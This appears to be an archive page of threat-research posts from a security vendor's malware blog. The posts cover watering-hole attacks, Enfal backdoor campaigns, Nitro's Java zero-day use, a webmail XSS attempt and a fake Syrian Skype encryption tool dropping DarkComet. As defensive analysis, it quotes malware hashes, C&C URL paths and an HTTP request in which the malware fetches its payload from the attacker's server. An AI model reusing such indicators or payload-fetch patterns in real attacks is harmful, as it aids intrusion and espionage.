Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    September 2015
    S M T W T F S
    « Aug    
  • Email Subscription

  • About Us

    Author Archive - Nart Villeneuve (Senior Threat Researcher)

    The term “Watering Hole” has become a popular way to describe targeted malware attacks in which the attackers compromise a legitimate website and insert a “drive-by” exploit in order to compromise the website’s visitors. Two recent papers by our friends at RSA and Symantec documented such attacks.

    Of course, such attacks are not new. This technique has long been used by indiscriminate cybercriminal attacks as well as targeted malware attacks. I documented the use of such techniques in 2009 and 2010 and there have been more recent cases as well.

    While cybercriminals use “drive-by” exploits to indiscriminately compromise as many computers as they can, the use of this technique in relation to APT activity is what Shadowserver aptly described as “strategic web compromises”. The objective is to selectively target visitors interested in specific content. Such attacks often emerge in conjunction with a new drive-by exploit.

    Read the rest of this entry »

    Posted in Malware | Comments Off on Watering Holes and Zero-Day Attacks

    Modified versions of the Enfal malware, which figured prominently in the LURID attacks, were seen to have infected more than 800 systems worldwide. Enfal variants are known to communicate to specific servers that gives potential attackers access and even full control of infected systems.

    We recently uncovered several attacks that used a modified version of Enfal, which have compromised 874 systems in 33 countries. Enfal was the malware used in the LURID targeted attacks, which we documented last September 2011. The malware was also linked to attacks going back to 2006 and possibly even 2002.

    We investigated five command-and-control (C&C) servers related to these attacks and found that there were victim concentrations in Vietnam, Russia and Mongolia.

    These identified targeted victims can be categorized as:

    • Government Ministries and Agencies
    • Military and Defense contractors
    • Nuclear and Energy sectors
    • Space and Aviation
    • Tibetan community

    Here are the top 5 countries that had compromised computers connecting to the five C&C servers. Note that a single compromised system may connect to more than one server.

    C&C (1) {BLOCKED}2.152.14
    Vietnam 394
    Russia 34
    India 19
    China 14
    Bangladesh 11
    C&C (2) {BLOCKED}2.153.79
    Russia 85
    Mongolia 65
    Kazakhstan 32
    United States 19
    India 14
    C&C (3) {BLOCKED}8.175.122
    Mongolia 41
    Russia 14
    China 11
    Philippines 6
    India 5
    C&C (4) {BLOCKED}3.76.90
    Mongolia 42
    Russia 25
    Philippines 5
    China 4
    Brazil 2
    C&C (5) {BLOCKED}2.154.203
    Russia 36
    Kazakhstan 2
    Pakistan 1

    It should be noted, however, that in many cases we were unable to identify a specific victim beyond ISP and country. We are continuously notifying compromised parties via appropriate channels.

    Attacks Using Modified Enfal With Campaign “Tags”

    We found that there were 63 campaign “tags” or codes that the attackers used to keep track of which attack compromised which computers. Here are the top 5 campaign tags.

    Campaign tags
    ynshll 221
    ynsh 113
    mgin 89
    0821zh 40
    ym2012814 38

    During our research, we found that the typical vectors used in the attacks are socially-engineered emails with a malicious attachment.

    The attachment is the malicious document Special General Meeting.doc (detected as TROJ_ARTIEF.JN) that exploits a Microsoft Office vulnerability (CVE-2012-0158) to drop BKDR_MECIV.AF onto targeted computer. The compromised computer begins to communicate with a C&C server through which the attackers can maintain full control of the computer.

    Special General Meeting.doc 2f66e1a97b17450445fbbec36de93daf TROJ_ARTIEF.JN
    datac1en.dll 9801d66d822cb44ea4bf8f4d2739e29c BKDR_MECIV.AF

    The communication between this variant of Enfal and previous ones is different. The names of the files requested on the C&C server have been changed, and so has the XOR value used to encrypt the communications. In addition, all the communication is XORed.

    Previous versions of Enfal have consistently requested “/cg[a-z]-bin/Owpq4.cgi” on the C&C server making it a consistent indicator.

    In addition, we found malicious documents in Russian that also drop the Enfal malware and connect to this network of C&C servers.

    Замысел Кавказ 2012.doc 81f40945554a4d585ea4993e43a493a5
    datac1en.dll 7185411935b5c24d600bd17debc2a0a0

    The samples of this Enfal variant, which connect to the URL path /8jwpc/odw3ux, have used a variety of sub-domains on at least five domain names as C&C servers: {BLOCKED},{BLOCKED}, {BLOCKED}, {BLOCKED} and {BLOCKED}

    In addition to this Enfal variant, its traditional version remains active as well. However, the modifications made to the traditional Enfal file paths indicate that the attackers are attempting to bypass defense measures such as IDS and network monitoring that match on Enfal’s consistent URL paths.

    Trend Micro Deep Discovery defends against these attacks using a three-level detection scheme:

    • Malware scan (i.e., signature and heuristic) and Sandbox simulation
    • Destination analysis using the Trend Micro Smart Protection Network
    • Rule-based heuristic analysis of network traffic

    Despite the modifications made to the Enfal malware, Deep Discovery is able to heuristically detect and defend against Enfal attacks.

    Coming Soon: The TrendLabs Security Intelligence Blog will be the new Malware Blog

    Posted in Malware, Targeted Attacks | Comments Off on Modified Enfal Variants Compromised 874 Systems

    The security community has been focused on the new Java zero-day exploits that appear to have been taken from a Chinese exploit pack (known as Gondad or KaiXin) used in targeted attacks by the “Nitro” cyber-espionage campaign and then incorporated into criminal operations using the BlackHole Exploit Kit. While the connections between these developments are starting to emerge, it is important to remember that campaigns, such as Nitro, don’t “come back” because they don’t go away. The Nitro attackers continued to be active after their activities were documented in 2011.

    In fact, before they acquired this Java exploit, the Nitro attackers were continuing to send out emails to their targets with direct links to Poison Ivy executables in early August 2012 (On a related note, another email was spotted in April 2012).

    The file Flashfxp.exe was hosted on one of the same servers that hosted the Java zero-day and Poison Ivy payload, and it connects to ok.{BLOCKED} which resolves to the same IP address, {BLOCKED}.{BLOCKED}..233.244. This is the same address as hello.{BLOCKED}, the domain used as the command and control server for the Poison Ivy payload dropped by the Java zero-day.

    Click to view full sizeDespite having at least two staging servers hosting the malicious files for the Java zero-day exploit (and at least three staging servers hosting executables), all the Poison Ivy payloads connect to domains that resolve to the same IP address. Numerous domain names used as Poison Ivy controllers related to the Nitro campaign also resolve to that IP address. While there was some initial skepticism regarding whether or not this Java exploit was used in targeted attacks, there appears to be increasing evidence that it was used by the “Nitro” attackers.

    Trend Micro products detect and remove the exploits and Poison Ivy payload. Deep Discovery™ also detects and blocks communication done by the Poison Ivy payload.

    Update as of August 31, 6:30 PM PDT

    Oracle has released an out-of-bound patch for Java which patches this zero-day exploit. The update increments the version number to Version 7 Update 7 for users on the latest JRE version; users still using Java 6 are also receiving an update that will increment their version to Version 6 Update 35. Users should immediately update their systems to protect against this threat.

    Update as of September 4, 11:10 AM PDT

    Trend Micro Deep Security users should apply the rule 1005178 – Java Applet Remote Code Execution Vulnerability – 2 to protect from threats seen exploiting this Java vulnerability.

    Coming Soon: The TrendLabs Security Intelligence Blog will be the new Malware Blog


    Recently, Trend Micro researchers encountered a potential vulnerability that affected users of Yahoo! Mail. We discovered several emails used in targeted attacks that contained JavaScript in the “From” field that attempted to launch a Document Object Model (DOM)-based cross-site scripting attack against the recipients of the email. However, we were not able to replicate the attack successfully. We have been in touch with Yahoo! about this problem.They, too, were unable to replicate this attack successfully at that time. However, to protect users against any such problems Yahoo! has strengthened their filters that sanitize user emails in order to protect against these kinds of attacks.

    This is not the first time that vulnerabilities have been found in popular webmail providers. We discussed almost a year ago that some of the major webmail providers – Gmail, Hotmail, and Yahoo! Mail – were all found to have some sort of vulnerability that compromised either the user’s email account or their system. It shouldn’t be a surprise that they’ve become targets as well: just about everyone uses these free services, and users don’t expect these services to have security problems of their own.

    As we’ve highlighted before, vulnerabilities like these are used in targeted attacks. Whether it’s vulnerabilities in user software or cloud-based services like free webmail, vulnerabilities allow attackers to compromise systems without the target being aware that anything has happened. This is extremely useful to attackers as the content compromised email accounts can be stolen by attackers and the account can be used to launch further attacks against the victim’s contacts.


    As the conflict in Syria persists, the Internet continues to play an interesting role. As we reported in a previous post, there have been targeted attacks against Syrian opposition supporters. With activists’ continued use of social media, it is not surprising to read reports of targeted phishing attempts to steal Facebook and YouTube credentials. A CNN report also revealed that a malware was being propagated through Skype, which brings us to another Skype-themed attack that we have uncovered.

    We discovered a webpage that advertises a software that purports to provide encryption for Skype. This page is hosted in Syria on {BLOCKED}, which resolves to {BLOCKED}.{BLOCKED}.0.28 – the same server that acted as a command-and-control (C&C) server for previous attacks. The webpage features an embedded YouTube video that claims to be from “IT Security Lab” and to encrypt voice communications.

    If users are tricked into downloading the file, a program does appear that is supposed to encrypt users’ Skype data. The said file, Skype Encription v 2.1.exe, is detected by Trend Micro as BKDR_METEO.HVN. During the analysis, we did not find any evidence that the software actually provides any security properties.

    This file contains some interesting strings that suggest it was created by “SyRiAnHaCkErS”:

    Encription v 2.1.pdb

    The software then issues a connection:

    GET /SkypeEncription/Download/skype.exe HTTP/1.1
    Host: {BLOCKED}.{BLOCKED}.0.28
    Connection: Keep-Alive

    The downloaded file skype.exe, detected as BKDR_ZAPCHAST.HVN, is actually DarkComet version 3.3 and connects to {BLOCKED}.{BLOCKED}.0.28 on port 771. We were able to redirect the traffic in our test environment to confirm that it is indeed DarkComet.

    Once BKDR_ZAPCHAST.HVN is installed, the attackers are able to take full control of the compromised system through the DarkComet RAT. The features of the DarkComet RAT have been covered here and here.

    Note that Skype uses AES encryption on calls and instant messages, as well as its video conversations.

    Trend Micro users need not worry as they are protected from this threat via Trend Micro™ Smart Protection Network™ that detects and deletes the related malware. We are also continuously monitoring this campaign and will update users for any significant developments.



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice